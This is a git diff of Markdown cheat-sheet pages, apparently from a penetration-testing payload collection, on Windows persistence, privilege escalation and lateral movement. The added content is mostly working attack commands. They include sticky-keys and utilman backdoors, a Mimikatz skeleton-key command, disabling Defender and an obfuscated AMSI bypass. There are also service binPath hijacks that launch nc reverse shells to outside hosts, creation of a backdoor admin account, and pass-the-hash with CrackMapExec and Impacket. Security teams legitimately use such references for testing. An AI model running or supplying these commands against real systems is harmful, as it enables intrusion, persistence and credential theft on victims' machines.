@ -156,6 +226,29 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
|
||||||
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Binary Replacement
|
||||||
|
|
||||||
|
#### Binary Replacement on Windows XP+
|
||||||
|
|
||||||
|
| Feature | Executable |
|
||||||
|
|---------------------|---------------------------------------|
|
||||||
|
| Sticky Keys | C:\Windows\System32\sethc.exe |
|
||||||
|
| Accessibility Menu | C:\Windows\System32\utilman.exe |
|
||||||
|
| On-Screen Keyboard | C:\Windows\System32\osk.exe |
|
||||||
|
| Magnifier | C:\Windows\System32\Magnify.exe |
|
||||||
|
| Narrator | C:\Windows\System32\Narrator.exe |
|
||||||
|
| Display Switcher | C:\Windows\System32\DisplaySwitch.exe |
|
||||||
|
| App Switcher | C:\Windows\System32\AtBroker.exe |
|
||||||
|
|
||||||
|
In Metasploit : `use post/windows/manage/sticky_keys`
|
||||||
|
|
||||||
|
#### Binary Replacement on Windows 10+
|
||||||
|
|
||||||
|
Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable.
|
||||||
|
|
||||||
|
Create a malicious **HID.dll** in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`.
|
||||||
|
|
||||||
|
|
||||||
### RDP Backdoor
|
### RDP Backdoor
|
||||||
|
|
||||||
#### utilman.exe
|
#### utilman.exe
|
||||||
|
@ -174,10 +267,25 @@ Hit F5 a bunch of times when you are at the RDP login screen.
|
||||||
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Skeleton Key
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Exploitation Command runned as DA:
|
||||||
|
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DCs FQDN>
|
||||||
|
|
||||||
|
# Access using the password "mimikatz"
|
||||||
|
Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
||||||
* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
|
* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
|
||||||
* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)
|
* [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)
|
||||||
|
* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html)
|
||||||
|
* [Persistence - Checklist - @netbiosX](https://github.com/netbiosX/Checklists/blob/master/Persistence.md)
|
||||||
|
* [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/)
|
||||||
|
* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/)
|
||||||
|
* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
|
||||||
|
* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
|
|
@ -6,13 +6,17 @@
|
||||||
* [Windows Version and Configuration](#windows-version-and-configuration)
|
* [Windows Version and Configuration](#windows-version-and-configuration)
|
||||||
* [User Enumeration](#user-enumeration)
|
* [User Enumeration](#user-enumeration)
|
||||||
* [Network Enumeration](#network-enumeration)
|
* [Network Enumeration](#network-enumeration)
|
||||||
* [AppLocker Enumeration](#applocker-enumeration)
|
* [Antivirus & Detections](#antivirus--detections)
|
||||||
|
* [Windows Defender](#windows-defender)
|
||||||
|
* [AppLocker Enumeration](#applocker-enumeration)
|
||||||
|
* [Powershell](#powershell)
|
||||||
|
* [Default Writeable Folders](#default-writeable-folders)
|
||||||
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
||||||
* [SAM and SYSTEM files](#sam-and-system-files)
|
* [SAM and SYSTEM files](#sam-and-system-files)
|
||||||
* [Search for file contents](#search-for-file-contents)
|
* [Search for file contents](#search-for-file-contents)
|
||||||
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
||||||
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
||||||
* [Passwords in unattend.xml](#passwords-in-unattend.xml)
|
* [Passwords in unattend.xml](#passwords-in-unattendxml)
|
||||||
* [Wifi passwords](#wifi-passwords)
|
* [Wifi passwords](#wifi-passwords)
|
||||||
* [Passwords stored in services](#passwords-stored-in-services)
|
* [Passwords stored in services](#passwords-stored-in-services)
|
||||||
* [Powershell history](#powershell-history)
|
* [Powershell history](#powershell-history)
|
||||||
|
@ -24,10 +28,13 @@
|
||||||
* [EoP - Kernel Exploitation](#eop---kernel-exploitation)
|
* [EoP - Kernel Exploitation](#eop---kernel-exploitation)
|
||||||
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
|
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
|
||||||
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
|
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
|
||||||
|
* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
|
||||||
* [EoP - Runas](#eop---runas)
|
* [EoP - Runas](#eop---runas)
|
||||||
|
* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies)
|
||||||
* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
|
* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
|
||||||
* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
|
* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
|
||||||
* [EoP - Impersonation Privileges](#eop---impersonation-privileges)
|
* [EoP - Impersonation Privileges](#eop---impersonation-privileges)
|
||||||
|
* [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
|
||||||
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
|
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
|
||||||
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
|
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
|
||||||
* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
|
* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
|
||||||
|
@ -62,6 +69,11 @@
|
||||||
- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
|
- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
|
||||||
- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
|
- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
|
||||||
- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
|
- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
|
||||||
|
```powershell
|
||||||
|
Seatbelt.exe -group=all -full
|
||||||
|
Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt"
|
||||||
|
Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""
|
||||||
|
```
|
||||||
- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
|
- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
|
||||||
- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
|
- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -221,11 +233,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
|
||||||
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||||||
```
|
```
|
||||||
|
|
||||||
## AppLocker Enumeration
|
## Antivirus & Detections
|
||||||
|
|
||||||
|
### Windows Defender
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# check status of Defender
|
||||||
|
PS C:\> Get-MpComputerStatus
|
||||||
|
|
||||||
|
# disable Real Time Monitoring
|
||||||
|
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||||
|
```
|
||||||
|
|
||||||
|
### AppLocker Enumeration
|
||||||
|
|
||||||
- With the GPO
|
- With the GPO
|
||||||
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
||||||
|
|
||||||
|
List AppLocker rules
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS C:\> $a = Get-ApplockerPolicy -effective
|
||||||
|
PS C:\> $a.rulecollections
|
||||||
|
```
|
||||||
|
|
||||||
|
### Powershell
|
||||||
|
|
||||||
|
Default powershell locations in a Windows system.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
C:\windows\syswow64\windowspowershell\v1.0\powershell
|
||||||
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||||||
|
```
|
||||||
|
|
||||||
|
Example of AMSI Bypass.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Default Writeable Folders
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
|
||||||
|
C:\Windows\System32\spool\drivers\color
|
||||||
|
C:\Windows\Tasks
|
||||||
|
C:\windows\tracing
|
||||||
|
```
|
||||||
|
|
||||||
## EoP - Looting for passwords
|
## EoP - Looting for passwords
|
||||||
|
|
||||||
### SAM and SYSTEM files
|
### SAM and SYSTEM files
|
||||||
|
@ -416,6 +472,7 @@ tasklist /v
|
||||||
net start
|
net start
|
||||||
sc query
|
sc query
|
||||||
Get-Service
|
Get-Service
|
||||||
|
Get-Process
|
||||||
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
|
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -519,9 +576,9 @@ Prerequisite: Service account
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
PS C:\Windows\system32> sc.exe stop UsoSvc
|
PS C:\Windows\system32> sc.exe stop UsoSvc
|
||||||
PS C:\Windows\system32> sc.exe config UsoSvc binPath="cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\a.txt"
|
|
||||||
PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||||||
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||||||
|
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||||||
PS C:\Windows\system32> sc.exe qc usosvc
|
PS C:\Windows\system32> sc.exe qc usosvc
|
||||||
[SC] QueryServiceConfig SUCCESS
|
[SC] QueryServiceConfig SUCCESS
|
||||||
|
|
||||||
|
@ -687,6 +744,26 @@ Application running as SYSTEM allowing an user to spawn a CMD, or browse directo
|
||||||
|
|
||||||
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
|
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
|
||||||
|
|
||||||
|
## EoP - Evaluating Vulnerable Drivers
|
||||||
|
Look for vuln drivers loaded, we often don't spend enough time looking at this:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS C:\Users\Swissky> driverquery.exe /fo table
|
||||||
|
|
||||||
|
Module Name Display Name Driver Type Link Date
|
||||||
|
============ ====================== ============= ======================
|
||||||
|
1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM
|
||||||
|
3ware 3ware Kernel 5/18/2015 6:28:03 PM
|
||||||
|
ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM
|
||||||
|
AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM
|
||||||
|
acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM
|
||||||
|
acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM
|
||||||
|
AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM
|
||||||
|
acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM
|
||||||
|
ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM
|
||||||
|
<SNIP>
|
||||||
|
```
|
||||||
|
|
||||||
## EoP - Runas
|
## EoP - Runas
|
||||||
|
|
||||||
Use the `cmdkey` to list the stored credentials on the machine.
|
Use the `cmdkey` to list the stored credentials on the machine.
|
||||||
|
@ -712,12 +789,27 @@ C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\us
|
||||||
```
|
```
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
|
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
|
||||||
$ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
|
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
|
||||||
$ computer = "<hostname>"
|
$computer = "<hostname>"
|
||||||
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
|
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## EoP - Abusing Shadow Copies
|
||||||
|
|
||||||
|
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# List shadow copies using vssadmin (Needs Admnistrator Access)
|
||||||
|
vssadmin list shadows
|
||||||
|
|
||||||
|
# List shadow copies using diskshadow
|
||||||
|
diskshadow list shadows all
|
||||||
|
|
||||||
|
# Make a symlink to the shadow copy and access it
|
||||||
|
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
|
||||||
|
```
|
||||||
|
|
||||||
## EoP - From local administrator to NT SYSTEM
|
## EoP - From local administrator to NT SYSTEM
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -758,6 +850,37 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel
|
||||||
|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
|
|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
|
||||||
|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified. ||
|
|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified. ||
|
||||||
|
|
||||||
|
### Restore A Service Account's Privileges
|
||||||
|
|
||||||
|
> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# https://github.com/itm4n/FullPowers
|
||||||
|
|
||||||
|
c:\TOOLS>FullPowers
|
||||||
|
[+] Started dummy thread with id 9976
|
||||||
|
[+] Successfully created scheduled task.
|
||||||
|
[+] Got new token! Privilege count: 7
|
||||||
|
[+] CreateProcessAsUser() OK
|
||||||
|
Microsoft Windows [Version 10.0.19041.84]
|
||||||
|
(c) 2019 Microsoft Corporation. All rights reserved.
|
||||||
|
|
||||||
|
C:\WINDOWS\system32>whoami /priv
|
||||||
|
PRIVILEGES INFORMATION
|
||||||
|
----------------------
|
||||||
|
Privilege Name Description State
|
||||||
|
============================= ========================================= =======
|
||||||
|
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
|
||||||
|
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
|
||||||
|
SeAuditPrivilege Generate security audits Enabled
|
||||||
|
SeChangeNotifyPrivilege Bypass traverse checking Enabled
|
||||||
|
SeImpersonatePrivilege Impersonate a client after authentication Enabled
|
||||||
|
SeCreateGlobalPrivilege Create global objects Enabled
|
||||||
|
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
|
||||||
|
|
||||||
|
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Meterpreter getsystem and alternatives
|
### Meterpreter getsystem and alternatives
|
||||||
|
|
||||||
|
@ -794,7 +917,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
|
||||||
### Juicy Potato (abusing the golden privileges)
|
### Juicy Potato (abusing the golden privileges)
|
||||||
|
|
||||||
Binary available at : https://github.com/ohpe/juicy-potato/releases
|
Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||||
:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809.
|
:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +.
|
||||||
|
|
||||||
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
|
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
|
||||||
|
|
||||||
|
|
|
@ -9,10 +9,12 @@
|
||||||
* [Metasploit](#metasploit)
|
* [Metasploit](#metasploit)
|
||||||
* [Metasploit - SMB](#metasploit-smb)
|
* [Metasploit - SMB](#metasploit-smb)
|
||||||
* [Metasploit - Psexec](#metasploit-psexec)
|
* [Metasploit - Psexec](#metasploit-psexec)
|
||||||
|
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
|
||||||
|
* [WinRM](#winrm)
|
||||||
* [Crackmapexec](#crackmapexec)
|
* [Crackmapexec](#crackmapexec)
|
||||||
* [Winexe](#winexe)
|
* [Winexe](#winexe)
|
||||||
* [WMI](#wmi)
|
* [WMI](#wmi)
|
||||||
* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py)
|
* [Psexec.py / Smbexec.py / Wmiexec.py](#psexecpy--smbexecpy--wmiexecpy)
|
||||||
* [PsExec - Sysinternal](#psexec-sysinternal)
|
* [PsExec - Sysinternal](#psexec-sysinternal)
|
||||||
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
|
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
|
||||||
* [Netuse](#netuse)
|
* [Netuse](#netuse)
|
||||||
|
@ -23,7 +25,7 @@
|
||||||
### TIP 1 - Create your credential
|
### TIP 1 - Create your credential
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
net user hacker hacker1234* /add
|
net user hacker Hcker_12345678* /add /Y
|
||||||
net localgroup administrators hacker /add
|
net localgroup administrators hacker /add
|
||||||
net localgroup "Remote Desktop Users" hacker /add # RDP access
|
net localgroup "Remote Desktop Users" hacker /add # RDP access
|
||||||
net localgroup "Backup Operators" hacker /add # Full access to files
|
net localgroup "Backup Operators" hacker /add # Full access to files
|
||||||
|
@ -91,40 +93,96 @@ shell
|
||||||
|
|
||||||
## Crackmapexec
|
## Crackmapexec
|
||||||
|
|
||||||
```python
|
```powershell
|
||||||
git clone https://github.com/byt3bl33d3r/CrackMapExec.github
|
root@payload$ git clone https://github.com/byt3bl33d3r/CrackMapExec.github
|
||||||
python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -x 'whoami' # cmd
|
||||||
python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -X 'whoami' # powershell
|
||||||
# pass the hash
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method atexec -x 'whoami'
|
||||||
cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method wmiexec -x 'whoami'
|
||||||
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami'
|
||||||
|
```
|
||||||
|
|
||||||
|
## Remote Code Execution with PS Credentials
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS C:\> $SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force
|
||||||
|
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword)
|
||||||
|
PS C:\> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami}
|
||||||
|
```
|
||||||
|
|
||||||
|
## WinRM
|
||||||
|
|
||||||
|
Require:
|
||||||
|
* Port **5985** or **5986** open.
|
||||||
|
* Default endpoint is **/wsman**
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
root@payload$ git clone https://github.com/Hackplayers/evil-winrm
|
||||||
|
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
|
||||||
|
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||||
|
```
|
||||||
|
|
||||||
|
or using a custom ruby code to interact with the WinRM service.
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
require 'winrm'
|
||||||
|
|
||||||
|
conn = WinRM::Connection.new(
|
||||||
|
endpoint: 'http://ip:5985/wsman',
|
||||||
|
user: 'domain/user',
|
||||||
|
password: 'password',
|
||||||
|
)
|
||||||
|
|
||||||
|
command=""
|
||||||
|
conn.shell(:powershell) do |shell|
|
||||||
|
until command == "exit\n" do
|
||||||
|
print "PS > "
|
||||||
|
command = gets
|
||||||
|
output = shell.run(command) do |stdout, stderr|
|
||||||
|
STDOUT.print stdout
|
||||||
|
STDERR.print stderr
|
||||||
|
end
|
||||||
|
end
|
||||||
|
puts "Exiting with code #{output.exitcode}"
|
||||||
|
end
|
||||||
```
|
```
|
||||||
|
|
||||||
## Winexe
|
## Winexe
|
||||||
|
|
||||||
Integrated to Kali
|
Integrated to Kali
|
||||||
|
|
||||||
```python
|
```powershell
|
||||||
winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
|
root@payload$ winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
## WMI
|
## WMI
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe”
|
PS C:\> wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe”
|
||||||
```
|
```
|
||||||
|
|
||||||
## Psexec.py / Smbexec.py / Wmiexec.py
|
## Psexec.py / Smbexec.py / Wmiexec.py
|
||||||
|
|
||||||
from Impacket
|
from Impacket
|
||||||
|
|
||||||
```python
|
```powershell
|
||||||
git clone https://github.com/CoreSecurity/impacket.git
|
root@payload$ git clone https://github.com/CoreSecurity/impacket.git
|
||||||
python psexec.py DOMAIN/username:password@10.10.10.10
|
|
||||||
python smbexec.py DOMAIN/username:password@10.10.10.10
|
|
||||||
python wmiexec.py DOMAIN/username:password@10.10.10.10
|
|
||||||
|
|
||||||
# psexec.exe -s cmd
|
# PSEXEC like functionality example using RemComSv
|
||||||
# switch admin user to NT Authority/System
|
root@payload$ python psexec.py DOMAIN/username:password@10.10.10.10
|
||||||
|
# this will drop a binary on the disk = noisy
|
||||||
|
|
||||||
|
# A similar approach to PSEXEC w/o using RemComSvc
|
||||||
|
root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10
|
||||||
|
|
||||||
|
# A semi-interactive shell, used through Windows Management Instrumentation.
|
||||||
|
root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
|
||||||
|
|
||||||
|
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
|
||||||
|
root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
|
||||||
|
|
||||||
|
# Executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
|
||||||
|
root@payload$ python dcomexec.py DOMAIN/username:password@10.10.10.10
|
||||||
```
|
```
|
||||||
|
|
||||||
## PsExec - Sysinternal
|
## PsExec - Sysinternal
|
||||||
|
@ -132,8 +190,10 @@ python wmiexec.py DOMAIN/username:password@10.10.10.10
|
||||||
from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)
|
from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
|
PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
|
||||||
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell
|
|
||||||
|
# switch admin user to NT Authority/System
|
||||||
|
PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s
|
||||||
```
|
```
|
||||||
|
|
||||||
## RDP Remote Desktop Protocol
|
## RDP Remote Desktop Protocol
|
||||||
|
@ -141,14 +201,14 @@ PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get
|
||||||
Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
|
PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
|
||||||
```
|
```
|
||||||
|
|
||||||
Or connect remotely with `rdesktop`
|
